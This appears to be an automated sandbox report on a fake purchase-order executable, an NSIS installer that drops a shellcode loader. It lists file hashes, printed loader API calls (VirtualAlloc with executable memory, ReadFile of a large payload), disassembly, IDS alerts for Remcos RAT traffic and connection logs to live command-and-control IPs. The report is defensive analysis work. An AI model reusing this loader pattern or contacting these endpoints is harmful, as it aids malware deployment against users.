                                                                              Encrypted:false
                                                                              SSDEEP:3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
                                                                              MD5:87C38DC6EF4616FF016D1CCC1A793086
                                                                              SHA1:AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
                                                                              SHA-256:781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
                                                                              SHA-512:CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
                                                                              Malicious:false
                                                                              Preview:[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcfacc3d9, page size 32768, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):17301504
                                                                              Entropy (8bit):0.8012019348796382
                                                                              Encrypted:false
                                                                              SSDEEP:6144:idfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:wVQ4e81ySaKKjLrONseWe
                                                                              MD5:AD14CD329D1933166D6973AB9DEEA5AD
                                                                              SHA1:AACAE162E69976990468F9D98DFAE54B4C829255
                                                                              SHA-256:28229178357AAF7AA8C6F9E9B52B1C9DEA06985B0B2E7878A50E438F247A80E2
                                                                              SHA-512:DF024435B3B46AF08CFB6D6801B83D75CA637EE2FF321F1FF6F42A96328A1FFF2424D0D64BCDD146FD4597C9FBC175FA3673CDEF448749120D48E6271280C436
                                                                              Malicious:false
                                                                              Preview:...... .......;!......E{ow("...{........................@...../....{K..:...|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]...................................d..:...|...................F...:...|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):74
                                                                              Entropy (8bit):3.9637832956585757
                                                                              Encrypted:false
                                                                              SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                              MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                              SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                              SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                              SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                              Malicious:false
                                                                              Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):52
                                                                              Entropy (8bit):4.0914493934217315
                                                                              Encrypted:false
                                                                              SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                              MD5:5D04A35D3950677049C7A0CF17E37125
                                                                              SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                              SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                              SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                              Malicious:false
                                                                              Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):30
                                                                              Entropy (8bit):4.256564762130954
                                                                              Encrypted:false
                                                                              SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                              MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                              SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                              SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                              SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                              Malicious:false
                                                                              Preview:user32::EnumWindows(i r1 ,i 0)
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11776
                                                                              Entropy (8bit):5.890541747176257
                                                                              Encrypted:false
                                                                              SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                              MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                              SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                              SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                              SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                              Joe Sandbox View:
                                                                              • Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse
                                                                              • Filename: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Detection: malicious, Browse
                                                                              • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                              • Filename: RFQ LIST 767655776478637584637865763478634365634444444444444444453.exe, Detection: malicious, Browse
                                                                              • Filename: MC8017774DOCS.exe, Detection: malicious, Browse
                                                                              • Filename: Pigroots.exe, Detection: malicious, Browse
                                                                              • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious, Browse
                                                                              • Filename: Shave.exe, Detection: malicious, Browse
                                                                              • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                              • Filename: New listed items 7648767856387547354734567465647568487.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.543716429911504
                                                                              Encrypted:false
                                                                              SSDEEP:3:sEMBQEJkJVEjxZ3WxQoXUn:KWxvUn
                                                                              MD5:8566807B0DBB1131E5C9CD4CA8DC90B2
                                                                              SHA1:D8279ADFB8B6794F092DC5145F1F818D2207EACE
                                                                              SHA-256:65B6950878C1C94EF6D82733BFA7C16D36F614C7E7145591CB2B69CC5F41059B
                                                                              SHA-512:4492066DC6E21934768FD8AC977E0ECFDF6E9B16799C6F312835591DA5EBEC780BAC1CB072289ACD6D75A9833963C044572139AD026382862B83BB6FB3F87A43
                                                                              Malicious:false
                                                                              Preview:kernel32::VirtualAlloc(i 0,i 24375296, i 0x3000, i 0x40)p.r1
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):56
                                                                              Entropy (8bit):4.286618146008852
                                                                              Encrypted:false
                                                                              SSDEEP:3:sAAEVvjs+FFVL84n:fLbt
                                                                              MD5:A4ED3F074ABC98FF25B7D112905E0A73
                                                                              SHA1:F6F54ED5973966385B4AEBCA4F39A502CB59002A
                                                                              SHA-256:3FF81C84E399759FCA3120E3E56EF07DA7E27E37CBFF9F7E5B57C2216C76B655
                                                                              SHA-512:D5DEE225D8B1A6751B30C12B49C8525CB6B3FBC6394273B28092D498105898597F2F159B2A553CA7D524B29607541B6D2C2C5851A67227840036B03516F9D929
                                                                              Malicious:false
                                                                              Preview:kernel32::ReadFile(i r5, i r1, i 24375296,*i 0, i 0)i.r3
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview:..
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.227432899500881
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:scan_241205-801_draft_PO.exe
                                                                              File size:1'270'336 bytes
                                                                              MD5:16df1bbb45f31ef099862d1df04b9741
                                                                              SHA1:e9c1056bc30a3817d84656a944b39190cbb1b7c9
                                                                              SHA256:b5486818c1913895b913ace02e94fee62a6468b3df96abd6c75c863499873dd2
                                                                              SHA512:083ed41b277bfdaa0876c756868acb0286d22eb498aa4f18638a258a86559ddc6bce35d777b259f71b7d392291d5ee0ad346671931c562c89bafc4c555d877cb
                                                                              SSDEEP:24576:tmwFwYo/knJ5vkeSTejf+WNvXgd93W0wbenPc15QClzZ:gkVosnJSeSTw+WNfgdlZ0iPc/Q+zZ
                                                                              TLSH:6A45DF606F84C84EF35195B888F1DF58C16ABD681E2B4135E9BFB5ADE3B87872C47102
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                              Icon Hash:13314d4f13734d07
                                                                              Entrypoint:0x40336c
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=Oprrsbudskabet, O=Oprrsbudskabet, L=Lion-sur-Mer, C=FR
                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                              Error Number:-2146762487
                                                                              Not Before, Not After
                                                                              • 12/05/2024 03:29:18 12/05/2027 03:29:18
                                                                              Subject Chain
                                                                              • CN=Oprrsbudskabet, O=Oprrsbudskabet, L=Lion-sur-Mer, C=FR
                                                                              Version:3
                                                                              Thumbprint MD5:0750D63D405CE225CE6233930D79FE4E
                                                                              Thumbprint SHA-1:103C1664F9832D5F5E6117CB14C29D05D542C9AC
                                                                              Thumbprint SHA-256:23F30489107E45244D73D08E0ECC18B5B1A4A858F01F38FA2A279170663DF9D6
                                                                              Serial:37B3CCF0FFDBD0DBC18339A17ADE813D22B37C3F
                                                                              Instruction
                                                                              sub esp, 000002D4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              push 00000020h
                                                                              pop edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+14h], ebx
                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              call dword ptr [004080A8h]
                                                                              call dword ptr [004080A4h]
                                                                              and eax, BFFFFFFFh
                                                                              cmp ax, 00000006h
                                                                              mov dword ptr [007A8A2Ch], eax
                                                                              je 00007F1A3D565CE3h
                                                                              push ebx
                                                                              call 00007F1A3D568F95h
                                                                              cmp eax, ebx
                                                                              je 00007F1A3D565CD9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082B0h
                                                                              push esi
                                                                              call 00007F1A3D568F0Fh
                                                                              push esi
                                                                              call dword ptr [00408150h]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], 00000000h
                                                                              jne 00007F1A3D565CBCh
                                                                              push 0000000Ah
                                                                              call 00007F1A3D568F68h
                                                                              push 00000008h
                                                                              call 00007F1A3D568F61h
                                                                              push 00000006h
                                                                              mov dword ptr [007A8A24h], eax
                                                                              call 00007F1A3D568F55h
                                                                              cmp eax, ebx
                                                                              je 00007F1A3D565CE1h
                                                                              push 0000001Eh
                                                                              call eax
                                                                              test eax, eax
                                                                              je 00007F1A3D565CD9h
                                                                              or byte ptr [007A8A2Fh], 00000040h
                                                                              push ebp
                                                                              call dword ptr [00408044h]
                                                                              push ebx
                                                                              call dword ptr [004082A0h]
                                                                              mov dword ptr [007A8AF8h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+34h]
                                                                              push 000002B4h
                                                                              push eax
                                                                              push ebx
                                                                              push 0079FEE0h
                                                                              call dword ptr [00408188h]
                                                                              push 0040A2C8h
                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d50000x70e90.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x134ff80x1248.data
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x3a90000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x3d50000x70e900x71000ab638fb6923700bb7a1666fbd7cc59b4False0.2322382293971239data4.881089065976433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x3d53b80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.18547134361037962
                                                                              RT_ICON0x4173e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2476783390512244
                                                                              RT_ICON0x427c080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3134591128862729
                                                                              RT_ICON0x4310b00x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.32150375939849624
                                                                              RT_ICON0x4378980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.34209796672828097
                                                                              RT_ICON0x43cd200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.33963155408597073
                                                                              RT_ICON0x440f480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4183609958506224
                                                                              RT_ICON0x4434f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4861632270168856
                                                                              RT_ICON0x4445980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5737704918032787
                                                                              RT_ICON0x444f200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6374113475177305
                                                                              RT_DIALOG0x4453880x120dataEnglishUnited States0.53125
                                                                              RT_DIALOG0x4454a80x120dataEnglishUnited States0.5138888888888888
                                                                              RT_DIALOG0x4455c80xf8dataEnglishUnited States0.6330645161290323
                                                                              RT_DIALOG0x4456c00x60dataEnglishUnited States0.7291666666666666
                                                                              RT_GROUP_ICON0x4457200x92dataEnglishUnited States0.6986301369863014
                                                                              RT_VERSION0x4457b80x398OpenPGP Public KeyEnglishUnited States0.47391304347826085
                                                                              RT_MANIFEST0x445b500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                              DLLImport
                                                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-06T09:59:37.068311+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549801104.168.7.1680TCP
                                                                              2024-12-06T09:59:41.166077+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549812162.251.122.872404TCP
                                                                              2024-12-06T09:59:43.369222+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549818162.251.122.872404TCP
                                                                              2024-12-06T09:59:43.555357+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549819178.237.33.5080TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 6, 2024 09:59:35.834067106 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:35.954092979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:35.954242945 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:35.955327034 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:36.075088978 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068244934 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068272114 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068289042 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068310976 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068342924 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068351984 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068351984 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068397999 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068485975 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068500996 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068514109 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068526983 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068540096 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068547010 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068547010 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068588018 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068603992 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.068658113 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.068720102 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.188186884 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.188206911 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.188311100 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.192392111 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.192495108 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.192533016 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.192575932 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.200726986 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.200872898 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.260248899 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.260338068 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.260490894 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.260492086 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.264415979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.264533043 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.265975952 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.266105890 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.266149998 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.266238928 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.274476051 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.274564028 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.274611950 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.274611950 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.282865047 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.283082962 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.283224106 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.291163921 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.291270971 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.291378021 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.300359011 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.300436974 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.300568104 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.308027983 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.308057070 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.308087111 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.308120012 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.316564083 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.316618919 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.316652060 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.316684008 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.324038029 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.324210882 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.324278116 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.331634998 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.331733942 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.331835985 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.338975906 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.339049101 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.339174986 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.346277952 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.346297979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.346354961 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.453051090 CET8049801104.168.7.16192.168.2.5
